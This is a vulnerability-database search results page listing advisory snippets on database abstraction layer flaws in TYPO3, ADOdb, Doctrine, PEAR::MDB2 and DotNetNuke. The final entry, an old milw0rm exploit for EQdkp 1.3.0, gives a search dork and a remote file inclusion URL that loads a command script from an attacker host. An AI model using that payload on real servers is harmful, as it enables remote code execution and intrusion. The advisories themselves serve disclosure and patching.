15 matches found
Unauthorized Data Exposure
typo3/cms-core is vulnerable to unauthorized data exposure. The vulnerability is due to incomplete access control enforcement where frontend user group restrictions are applied only to the first table in multi-table queries using the database abstraction layer (DBAL), allowing attackers to access...
GHSA-X8PV-FGXP-8V3X TYPO3 Allows Information Disclosure via DBAL Restriction Handling
Problem: When performing a database query involving multiple tables through the database abstraction layer (DBAL), frontend user permissions are only applied via FrontendGroupRestriction to the last table. As a result, data from additional tables included in the same query may be unintentionally...
CVE-2025-47937 TYPO3 Vulnerable to Information Disclosure via DBAL Restriction Handling
TYPO3 is an open source, PHP based web content management system. Starting in version 9.0.0 and prior to versions 9.5.51 ELTS, 10.4.50 ELTS, 11.5.44 ELTS, 12.4.31 LTS, and 13.4.12 LTS, when performing a database query involving multiple tables through the database abstraction layer (DBAL), frontend...
CVE-2025-47937 TYPO3 Vulnerable to Information Disclosure via DBAL Restriction Handling
TYPO3 is an open source, PHP based web content management system. Starting in version 9.0.0 and prior to versions 9.5.51 ELTS, 10.4.50 ELTS, 11.5.44 ELTS, 12.4.31 LTS, and 13.4.12 LTS, when performing a database query involving multiple tables through the database abstraction layer (DBAL), frontend...
PT-2025-22139 · Typo3 · Typo3
Name of the Vulnerable Software and Affected Versions: TYPO3 versions 9.0.0 through 9.5.50 ELTS; TYPO3 versions 10.0.0 through 10.4.49 ELTS; TYPO3 versions 11.0.0 through 11.5.43 ELTS; TYPO3 versions 12.0.0 through 12.4.30 LTS; TYPO3 versions 13.0.0 through 13.4.11 LTS. Description: The issue affects...
UBUNTU-CVE-2016-4855
Cross-site scripting vulnerability in ADOdb versions prior to 5.20.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors...
ADOdb vulnerable to cross-site scripting
Overview: ADOdb is a database abstraction layer for PHP. The library's test script test.php contains a cross-site scripting (CWE-79) vulnerability. ASAI Ken reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. Impact: An...
[SECURITY] Fedora 23 Update: php-doctrine-orm-2.4.8-1.fc23
Object relational mapper (ORM) for PHP that sits on top of a powerful database abstraction layer (DBAL). One of its key features is the option to write database queries in a proprietary object oriented SQL dialect called Doctrine Query Language (DQL), inspired by Hibernate's HQL. This provides...
[SECURITY] Fedora 19 Update: php-doctrine-orm-2.4.2-2.fc19
Object relational mapper (ORM) for PHP that sits on top of a powerful database abstraction layer (DBAL). One of its key features is the option to write database queries in a proprietary object oriented SQL dialect called Doctrine Query Language (DQL), inspired by Hibernate's HQL. This provides...
[SECURITY] Fedora 20 Update: php-doctrine-orm-2.4.2-2.fc20
Object relational mapper (ORM) for PHP that sits on top of a powerful database abstraction layer (DBAL). One of its key features is the option to write database queries in a proprietary object oriented SQL dialect called Doctrine Query Language (DQL), inspired by Hibernate's HQL. This provides...
Fedora Update for php-doctrine-Doctrine FEDORA-2011-4098
Check for the Version of php-doctrine-Doctrine. OpenVAS Vulnerability Test: Fedora Update for php-doctrine-Doctrine FEDORA-2011-4098. Authors: System Generated Check. Copyright: Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net. This program is free software; you can redistribute it...
[SECURITY] Fedora 14 Update: php-doctrine-Doctrine-1.2.4-1.fc14
Doctrine is an object relational mapper (ORM) for PHP 5.2.3+ that sits on top of a powerful database abstraction layer (DBAL). One of its key features is the option to write database queries in a proprietary object oriented SQL dialect called Doctrine Query Language (DQL), inspired by Hibernate's HQL...
PEAR::MDB2: Information disclosure
Background: PEAR::MDB2 is a database abstraction layer for PHP aimed to provide a common API for all supported relational database management systems. A LOB ("large object") is a database field holding binary data. Description: priyadi discovered that the request to store a URL string as a LOB is...
BDPDT for DotNetNuke (.net nuke) uploadfilepopup.aspx File Upload Privilege Escalation
The remote host contains BDPDT, a database abstraction layer used in various add-on modules for DotNetNuke. The installed version of the BDPDT contains an ASP.NET script that allows an unauthenticated attacker to gain control of the affected host by allowing uploading arbitrary files with the...
EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion
Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: "powered by EQdkp" Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-05-07...